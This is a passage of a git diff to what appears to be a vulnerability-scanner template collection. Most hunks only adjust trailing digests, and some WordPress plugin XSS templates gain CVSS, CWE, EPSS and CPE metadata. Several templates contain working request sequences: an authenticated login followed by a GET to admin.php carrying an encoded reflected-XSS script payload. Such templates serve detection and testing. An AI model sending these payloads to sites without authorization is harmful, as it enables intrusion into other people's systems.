diff --git a/http/cves/2016/CVE-2016-10033.yaml b/http/cves/2016/CVE-2016-10033.yaml index 87cc9f6f04..e06d755a42 100644 --- a/http/cves/2016/CVE-2016-10033.yaml +++ b/http/cves/2016/CVE-2016-10033.yaml @@ -63,4 +63,5 @@ http: - 'Author:(?:[A-Za-z0-9 -\_="]+)?alert(document.domain)")' - 'contains(body_2, "2kb-amazon-affiliates-store")' condition: and -# digest: 4a0a0047304502201453a129508990a1e3175b4d7d9c7cd03a3ffff8e45d8c66d6e8f775cba54b86022100c6947c67dcc1cdc40042a38010cca9da0bb074a3fad1a81ed33611e2f983d292:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502201453a129508990a1e3175b4d7d9c7cd03a3ffff8e45d8c66d6e8f775cba54b86022100c6947c67dcc1cdc40042a38010cca9da0bb074a3fad1a81ed33611e2f983d292:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-14651.yaml b/http/cves/2017/CVE-2017-14651.yaml index a617607c70..23b76d6ef8 100644 --- a/http/cves/2017/CVE-2017-14651.yaml +++ b/http/cves/2017/CVE-2017-14651.yaml @@ -44,4 +44,5 @@ http: part: header words: - "text/html" -# digest: 490a0046304402204909c18ba33f186b6288c7b4630edc0d75f9e84fb721565e0b271d24cf64c3bc022010f050cdac9dc4bfb0868ec93f32535e90349cb6a7c38295d8a7a277ee7bb0c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402204909c18ba33f186b6288c7b4630edc0d75f9e84fb721565e0b271d24cf64c3bc022010f050cdac9dc4bfb0868ec93f32535e90349cb6a7c38295d8a7a277ee7bb0c1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-14849.yaml b/http/cves/2017/CVE-2017-14849.yaml index 851ab14c85..b6850f29d6 100644 --- a/http/cves/2017/CVE-2017-14849.yaml +++ b/http/cves/2017/CVE-2017-14849.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bd1652dad9af6e80bf2e9372d1f258786f28827f5539f04c3e60073cbe480c1e02205afc5837bf87635871fee42a764a3d088b2aaabad2224172398bc3edb8c317eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100bd1652dad9af6e80bf2e9372d1f258786f28827f5539f04c3e60073cbe480c1e02205afc5837bf87635871fee42a764a3d088b2aaabad2224172398bc3edb8c317eb:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-15287.yaml b/http/cves/2017/CVE-2017-15287.yaml index aa796b4d37..d292f2e988 100644 --- a/http/cves/2017/CVE-2017-15287.yaml +++ b/http/cves/2017/CVE-2017-15287.yaml @@ -38,4 +38,5 @@ http: - type: word words: - 'Unknown command: ' -# digest: 4a0a0047304502204766bda5cfd6913ed555556aa855578c0e17895c9c6eeac491e25610cc95a74e022100e159ebddbcfd326081e018ca1f9f1e525c508c1c7824b740ba99e610dd3493e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502204766bda5cfd6913ed555556aa855578c0e17895c9c6eeac491e25610cc95a74e022100e159ebddbcfd326081e018ca1f9f1e525c508c1c7824b740ba99e610dd3493e1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-15363.yaml b/http/cves/2017/CVE-2017-15363.yaml index 4a67228153..36a90d6fc2 100644 --- a/http/cves/2017/CVE-2017-15363.yaml +++ b/http/cves/2017/CVE-2017-15363.yaml @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b266146f0c1ae7b27314f0400ad46fcec4682aba876619e7ec8b9bdb70934f3202201c020c5d101351e6f2f14e140f67ded721f40d6e0158bf60f0cec7f064fff229:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100b266146f0c1ae7b27314f0400ad46fcec4682aba876619e7ec8b9bdb70934f3202201c020c5d101351e6f2f14e140f67ded721f40d6e0158bf60f0cec7f064fff229:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-15647.yaml b/http/cves/2017/CVE-2017-15647.yaml index eee6973547..b44fb7841b 100644 --- a/http/cves/2017/CVE-2017-15647.yaml +++ b/http/cves/2017/CVE-2017-15647.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f75c5af4d67f951a06bfa58aa6095430450471d9980741f149c7b40e4a4bb077022100b756be668a8652ba1c0656a86bc0ea8dad6795dd9f83b08e689570f8621a7ac5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100f75c5af4d67f951a06bfa58aa6095430450471d9980741f149c7b40e4a4bb077022100b756be668a8652ba1c0656a86bc0ea8dad6795dd9f83b08e689570f8621a7ac5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-16806.yaml b/http/cves/2017/CVE-2017-16806.yaml index 7c4145285b..51685757dd 100644 --- a/http/cves/2017/CVE-2017-16806.yaml +++ b/http/cves/2017/CVE-2017-16806.yaml @@ -44,4 +44,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022042d64cc73ef44aae490e5de8cc63791fd8501816c29f3d94dd5944361b468760022052bf867fdf27e497c55def0c25d61caf7f12128d2b99012bbe0ab353f0423a60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022042d64cc73ef44aae490e5de8cc63791fd8501816c29f3d94dd5944361b468760022052bf867fdf27e497c55def0c25d61caf7f12128d2b99012bbe0ab353f0423a60:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-16877.yaml b/http/cves/2017/CVE-2017-16877.yaml index 57e24ca54f..54964a8447 100644 --- a/http/cves/2017/CVE-2017-16877.yaml +++ b/http/cves/2017/CVE-2017-16877.yaml @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b2744c6eda3144bfa38fa6e80563ff9516f19cb09739103599736168fdd6bcc602201e58ba0eac70750412d6d89e3431eba2b939bda02410d7163887d8712fddf394:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100b2744c6eda3144bfa38fa6e80563ff9516f19cb09739103599736168fdd6bcc602201e58ba0eac70750412d6d89e3431eba2b939bda02410d7163887d8712fddf394:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-16894.yaml b/http/cves/2017/CVE-2017-16894.yaml index de1a79a819..bf2786521a 100644 --- a/http/cves/2017/CVE-2017-16894.yaml +++ b/http/cves/2017/CVE-2017-16894.yaml @@ -54,4 +54,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d23bc977f301fa3e3d91345026d3f6aa9517eebb7eb978070816b2e8eadd237902206bd3d1e568254af8df6e7455cb8c17ec196aea13660046c634334ac8e57a8d9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100d23bc977f301fa3e3d91345026d3f6aa9517eebb7eb978070816b2e8eadd237902206bd3d1e568254af8df6e7455cb8c17ec196aea13660046c634334ac8e57a8d9d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-17059.yaml b/http/cves/2017/CVE-2017-17059.yaml index 561cc23841..60165e11cb 100644 --- a/http/cves/2017/CVE-2017-17059.yaml +++ b/http/cves/2017/CVE-2017-17059.yaml @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022063530672915e8ea73ba33797524cd3b95ee4828331c08be13c37b165c8f773b5022100c5b502c7b992c11a081b23dbea8ffad1fbc682258e8dc1000abdbed03274df34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022063530672915e8ea73ba33797524cd3b95ee4828331c08be13c37b165c8f773b5022100c5b502c7b992c11a081b23dbea8ffad1fbc682258e8dc1000abdbed03274df34:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-17451.yaml b/http/cves/2017/CVE-2017-17451.yaml index c855434b8a..b8d0cc8243 100644 --- a/http/cves/2017/CVE-2017-17451.yaml +++ b/http/cves/2017/CVE-2017-17451.yaml @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402205901781f9e2fa8f52d3fb8fa06ebe0ac268460d3699396ff421c989d4d5d599c02204528615a4e03e30b5754cc8e51209a328a5a9be9906ca5d9515f46f804103223:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402205901781f9e2fa8f52d3fb8fa06ebe0ac268460d3699396ff421c989d4d5d599c02204528615a4e03e30b5754cc8e51209a328a5a9be9906ca5d9515f46f804103223:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-17562.yaml b/http/cves/2017/CVE-2017-17562.yaml index 0d25c74ea9..bb4ac7f447 100644 --- a/http/cves/2017/CVE-2017-17562.yaml +++ b/http/cves/2017/CVE-2017-17562.yaml @@ -115,4 +115,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402200d51047907c1e16988f2554262aec9d2836435def48eacfd6be48544bc1ae355022031a0dcb5614dedd873dde8c9b4e398661dc02be396c910702d83f84f54fd27db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402200d51047907c1e16988f2554262aec9d2836435def48eacfd6be48544bc1ae355022031a0dcb5614dedd873dde8c9b4e398661dc02be396c910702d83f84f54fd27db:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-17731.yaml b/http/cves/2017/CVE-2017-17731.yaml index fc8ba971cd..52ec8be69d 100644 --- a/http/cves/2017/CVE-2017-17731.yaml +++ b/http/cves/2017/CVE-2017-17731.yaml @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a18445627b942efba7c2df2ad24569669e84f2a3a8e38e1e41f02a0dd1165ae102207ae7435ffe20804f59a8f3454fabc9cba76e831c78848834925df24ddced4f9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100a18445627b942efba7c2df2ad24569669e84f2a3a8e38e1e41f02a0dd1165ae102207ae7435ffe20804f59a8f3454fabc9cba76e831c78848834925df24ddced4f9d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-17736.yaml b/http/cves/2017/CVE-2017-17736.yaml index 3c65b36fc1..ac697afe63 100644 --- a/http/cves/2017/CVE-2017-17736.yaml +++ b/http/cves/2017/CVE-2017-17736.yaml @@ -47,4 +47,5 @@ http: - "Database Setup" - "SQLServer" condition: and -# digest: 4a0a00473045022100d5831de7cf135206baee069ab73448675d89dfb32908d46cde0f80fc635b245602207093fd5673bd587c7fec0e270cbaddb8334ca937c91ce2865048bd18ae9d8c90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100d5831de7cf135206baee069ab73448675d89dfb32908d46cde0f80fc635b245602207093fd5673bd587c7fec0e270cbaddb8334ca937c91ce2865048bd18ae9d8c90:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18024.yaml b/http/cves/2017/CVE-2017-18024.yaml index fdeb69fe86..8e833cdbe0 100644 --- a/http/cves/2017/CVE-2017-18024.yaml +++ b/http/cves/2017/CVE-2017-18024.yaml @@ -51,4 +51,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220014bf5f4567ecf02c8b7ccfe91d10209a71e5fd5b253a58b77a8de49aab58bdd022056e1b3e4cf9405f6689216ef172a2dd1027599f1e39ac2cdb583bdab101c1f39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220014bf5f4567ecf02c8b7ccfe91d10209a71e5fd5b253a58b77a8de49aab58bdd022056e1b3e4cf9405f6689216ef172a2dd1027599f1e39ac2cdb583bdab101c1f39:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18487.yaml b/http/cves/2017/CVE-2017-18487.yaml index 0f9f86be60..9eb17ec8e4 100644 --- a/http/cves/2017/CVE-2017-18487.yaml +++ b/http/cves/2017/CVE-2017-18487.yaml @@ -1,48 +1,56 @@ -id: CVE-2017-18487 - -info: - name: AdPush < 1.44 - Cross-Site Scripting - author: luisfelipe146 - severity: medium - description: | - The adsense-plugin (aka Google AdSense) plugin before 1.44 for WordPress has multiple XSS issues. - reference: - - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 - - https://nvd.nist.gov/vuln/detail/CVE-2017-18487 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18487 - - https://wordpress.org/plugins/adsense-plugin/#developers - classification: - cve-id: CVE-2017-18487 - metadata: - max-request: 3 - verified: true - publicwww-query: "/wp-content/plugins/adsense-plugin/" - tags: cve,cve2017,wordpress,wpscan,wp-plugin,xss,bws-adpush,authenticated - -http: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - log={{username}}&pwd={{password}}&wp-submit=Log+In - - - | - GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 - Host: {{Hostname}} - - - | - GET /wp-content/plugins/adsense-plugin/readme.txt HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers: - - type: dsl - dsl: - - 'status_code_2 == 200' - - 'contains(header_2, "text/html")' - - 'contains(body_2, ">\">All")' - - 'contains(body_3, "Google AdSense")' +id: CVE-2017-18487 + +info: + name: AdPush < 1.44 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The adsense-plugin (aka Google AdSense) plugin before 1.44 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18487 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18487 + - https://wordpress.org/plugins/adsense-plugin/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18487 + cwe-id: CWE-79 + epss-score: 0.00078 + epss-percentile: 0.32773 + cpe: cpe:2.3:a:google_adsense_project:google_adsense:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: google_adsense_project + product: google_adsense + framework: wordpress + publicwww-query: "/wp-content/plugins/adsense-plugin/" + tags: cve,cve2017,wordpress,wpscan,wp-plugin,xss,bws-adpush,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/adsense-plugin/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Google AdSense")' condition: and -# digest: 4a0a004730450220259ee4fe794fc580ee974f72be55f4f16c7cd9151c88018fb86c08101f91eece022100d9ebac26f2e797de29760afd221f6650af6d6867415bbbe1d3f2cf79e822bdee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220259ee4fe794fc580ee974f72be55f4f16c7cd9151c88018fb86c08101f91eece022100d9ebac26f2e797de29760afd221f6650af6d6867415bbbe1d3f2cf79e822bdee:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18490.yaml b/http/cves/2017/CVE-2017-18490.yaml index 6408f21737..c966b1cf2e 100644 --- a/http/cves/2017/CVE-2017-18490.yaml +++ b/http/cves/2017/CVE-2017-18490.yaml @@ -1,48 +1,56 @@ -id: CVE-2017-18490 - -info: - name: Contact Form Multi by BestWebSoft < 1.2.1 - Cross-Site Scripting - author: luisfelipe146 - severity: medium - description: | - The contact-form-multi plugin before 1.2.1 for WordPress has multiple XSS issues. - reference: - - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 - - https://nvd.nist.gov/vuln/detail/CVE-2017-18490 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18490 - - https://wordpress.org/plugins/contact-form-multi/#developers - classification: - cve-id: CVE-2017-18490 - metadata: - max-request: 3 - verified: true - publicwww-query: "/wp-content/plugins/contact-form-multi/" - tags: cve,cve2017,wordpress,bws-contact-form,wpscan,wp-plugin,xss,authenticated,contact-form-multi - -http: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - log={{username}}&pwd={{password}}&wp-submit=Log+In - - - | - GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 - Host: {{Hostname}} - - - | - GET /wp-content/plugins/contact-form-multi/readme.txt HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers: - - type: dsl - dsl: - - 'status_code_2 == 200' - - 'contains(header_2, "text/html")' - - 'contains(body_2, ">\">All")' - - 'contains(body_3, "Contact Form Multi by")' +id: CVE-2017-18490 + +info: + name: Contact Form Multi by BestWebSoft < 1.2.1 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The contact-form-multi plugin before 1.2.1 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18490 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18490 + - https://wordpress.org/plugins/contact-form-multi/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18490 + cwe-id: CWE-79 + epss-score: 0.00078 + epss-percentile: 0.32773 + cpe: cpe:2.3:a:bestwebsoft:contact_form_multi:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: contact_form_multi + framework: wordpress + publicwww-query: "/wp-content/plugins/contact-form-multi/" + tags: cve,cve2017,wordpress,bws-contact-form,wpscan,wp-plugin,xss,authenticated,contact-form-multi + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/contact-form-multi/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Contact Form Multi by")' condition: and -# digest: 4a0a00473045022100dd217ae93029ac47679fd8b19513554e9629a54c815f56cfd911585725171fa90220638dae0940c5eee85f5ca2d8498fdaddec79c424dcf10d7b032e8ad33be18832:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100dd217ae93029ac47679fd8b19513554e9629a54c815f56cfd911585725171fa90220638dae0940c5eee85f5ca2d8498fdaddec79c424dcf10d7b032e8ad33be18832:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18491.yaml b/http/cves/2017/CVE-2017-18491.yaml index cd495f7ec2..acd9d6853c 100644 --- a/http/cves/2017/CVE-2017-18491.yaml +++ b/http/cves/2017/CVE-2017-18491.yaml @@ -1,48 +1,56 @@ -id: CVE-2017-18491 - -info: - name: Contact Form by BestWebSoft < 4.0.6 - Cross-Site Scripting - author: luisfelipe146 - severity: medium - description: | - The contact-form-plugin plugin before 4.0.6 for WordPress has multiple XSS issues. - reference: - - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 - - https://nvd.nist.gov/vuln/detail/CVE-2017-18491 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18491 - - https://wordpress.org/plugins/contact-form-plugin/#developers - classification: - cve-id: CVE-2017-18491 - metadata: - max-request: 3 - verified: true - publicwww-query: "/wp-content/plugins/contact-form-plugin/" - tags: cve,cve2017,wordpress,bws,contact-form,wpscan,wp-plugin,xss,authenticated - -http: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - log={{username}}&pwd={{password}}&wp-submit=Log+In - - - | - GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 - Host: {{Hostname}} - - - | - GET /wp-content/plugins/contact-form-plugin/readme.txt HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers: - - type: dsl - dsl: - - 'status_code_2 == 200' - - 'contains(header_2, "text/html")' - - 'contains(body_2, ">\">All")' - - 'contains(body_3, "Contact Form by")' +id: CVE-2017-18491 + +info: + name: Contact Form by BestWebSoft < 4.0.6 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The contact-form-plugin plugin before 4.0.6 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18491 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18491 + - https://wordpress.org/plugins/contact-form-plugin/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18491 + cwe-id: CWE-79 + epss-score: 0.00078 + epss-percentile: 0.32773 + cpe: cpe:2.3:a:bestwebsoft:contact_form:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: contact_form + framework: wordpress + publicwww-query: "/wp-content/plugins/contact-form-plugin/" + tags: cve,cve2017,wordpress,bws,contact-form,wpscan,wp-plugin,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/contact-form-plugin/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Contact Form by")' condition: and -# digest: 4b0a00483046022100aba6bbc422d215c8066d132921560265d8c2c0d4cbadc50562fee394e336668c022100d5ea168901aa3f2b73996d780db09c260f7f96b3fcd3864599d75618356473c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100aba6bbc422d215c8066d132921560265d8c2c0d4cbadc50562fee394e336668c022100d5ea168901aa3f2b73996d780db09c260f7f96b3fcd3864599d75618356473c3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18492.yaml b/http/cves/2017/CVE-2017-18492.yaml index 48a281c49d..1b87b36e58 100644 --- a/http/cves/2017/CVE-2017-18492.yaml +++ b/http/cves/2017/CVE-2017-18492.yaml @@ -1,48 +1,56 @@ -id: CVE-2017-18492 - -info: - name: Contact Form to DB by BestWebSoft < 1.5.7 - Cross-Site Scripting - author: luisfelipe146 - severity: medium - description: | - The contact-form-to-db plugin before 1.5.7 for WordPress has multiple XSS issues. - reference: - - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 - - https://nvd.nist.gov/vuln/detail/CVE-2017-18492 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18492 - - https://wordpress.org/plugins/contact-form-to-db/#developers - classification: - cve-id: CVE-2017-18492 - metadata: - max-request: 3 - verified: true - publicwww-query: "/wp-content/plugins/contact-form-to-db/" - tags: cve,cve2017,wordpress,wpscan,bws-contact-form,wp-plugin,xss,authenticated - -http: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - log={{username}}&pwd={{password}}&wp-submit=Log+In - - - | - GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 - Host: {{Hostname}} - - - | - GET /wp-content/plugins/contact-form-to-db/readme.txt HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers: - - type: dsl - dsl: - - 'status_code_2 == 200' - - 'contains(header_2, "text/html")' - - 'contains(body_2, ">\">All")' - - 'contains(body_3, "Contact Form to DB by")' +id: CVE-2017-18492 + +info: + name: Contact Form to DB by BestWebSoft < 1.5.7 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The contact-form-to-db plugin before 1.5.7 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18492 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18492 + - https://wordpress.org/plugins/contact-form-to-db/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18492 + cwe-id: CWE-79 + epss-score: 0.00078 + epss-percentile: 0.32773 + cpe: cpe:2.3:a:bestwebsoft:contact_form_to_db:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: contact_form_to_db + framework: wordpress + publicwww-query: "/wp-content/plugins/contact-form-to-db/" + tags: cve,cve2017,wordpress,wpscan,bws-contact-form,wp-plugin,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/contact-form-to-db/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Contact Form to DB by")' condition: and -# digest: 4a0a00473045022100f0d37ce6ace644d68da339edbff7e63fa84c47809e27160953c9254bf4a1df350220427f195c3e3e33b7e414629a4a8204e46530dfc813ddd2a37b5f05e80de2fd3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100f0d37ce6ace644d68da339edbff7e63fa84c47809e27160953c9254bf4a1df350220427f195c3e3e33b7e414629a4a8204e46530dfc813ddd2a37b5f05e80de2fd3d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18493.yaml b/http/cves/2017/CVE-2017-18493.yaml index 8f105133e0..05a52c2139 100644 --- a/http/cves/2017/CVE-2017-18493.yaml +++ b/http/cves/2017/CVE-2017-18493.yaml @@ -1,48 +1,56 @@ -id: CVE-2017-18493 - -info: - name: Custom Admin Page by BestWebSoft < 0.1.2 - Cross-Site Scripting - author: luisfelipe146 - severity: medium - description: | - The custom-admin-page plugin before 0.1.2 for WordPress has multiple XSS issues. - reference: - - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 - - https://nvd.nist.gov/vuln/detail/CVE-2017-18493 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18493 - - https://wordpress.org/plugins/custom-admin-page/#developers - classification: - cve-id: CVE-2017-18493 - metadata: - max-request: 3 - verified: true - publicwww-query: "/wp-content/plugins/custom-admin-page/" - tags: cve,cve2017,wordpress,bws-adminpage,wpscan,wp-plugin,xss,authenticated - -http: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - log={{username}}&pwd={{password}}&wp-submit=Log+In - - - | - GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 - Host: {{Hostname}} - - - | - GET /wp-content/plugins/custom-admin-page/readme.txt HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers: - - type: dsl - dsl: - - 'status_code_2 == 200' - - 'contains(header_2, "text/html")' - - 'contains(body_2, ">\">All")' - - 'contains(body_3, "Custom Admin Page by")' +id: CVE-2017-18493 + +info: + name: Custom Admin Page by BestWebSoft < 0.1.2 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The custom-admin-page plugin before 0.1.2 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18493 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18493 + - https://wordpress.org/plugins/custom-admin-page/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18493 + cwe-id: CWE-79 + 